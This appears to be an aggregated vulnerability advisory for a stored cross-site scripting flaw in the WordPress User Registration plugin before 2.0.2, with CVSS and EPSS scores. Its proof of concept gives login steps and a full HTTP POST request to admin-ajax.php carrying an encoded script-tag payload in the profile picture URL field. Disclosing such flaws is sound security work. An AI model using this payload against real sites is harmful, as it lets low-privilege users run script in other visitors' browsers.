Lucene search

K
wpvulndbStiofanWPVDB-ID:5C7A9473-D32E-47D6-9F8E-15B96FE758F2
HistorySep 06, 2021 - 12:00 a.m.

User Registration < 2.0.2 - Low Privilege Stored Cross-Site Scripting

2021-09-0600:00:00
Stiofan
wpscan.com
7

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

3.5 Low

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

24.8%

The plugin does not properly sanitise the user_registration_profile_pic_url value when submitted directly via the user_registration_update_profile_details AJAX action. This could allow any authenticated user, such as subscriber, to perform Stored Cross-Site attacks when their profile is viewed

PoC

1. Login as any user (such as subscriber) and go to the edit profile page (the one generated by the plugin). 2. View the page source and get json var nonce β€œuser_registration_profile_details_save” 3. Add the below form to the page and and replace the security nonce with the one from step 2, then submit it. 4. View the profile page (as any user) to trigger the XSS.

POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 264 Connection: close Cookie: [your cookies, as any user] Upgrade-Insecure-Requests: 1 action=user_registration_update_profile_details&security;=143544a1fb&form;_data=%7B%22user_registration_profile_pic_url%22%3A%7B%22field_name%22%3A%22user_registration_profile_pic_url%22%2C%22value%22%3A%22%5C%22%3E%3Cscript%3Ealert%281%29%3C%5C%2Fscript%3E%22%7D%7D

CPENameOperatorVersion
user-registrationlt2.0.2

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

3.5 Low

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

24.8%

Related for WPVDB-ID:5C7A9473-D32E-47D6-9F8E-15B96FE758F2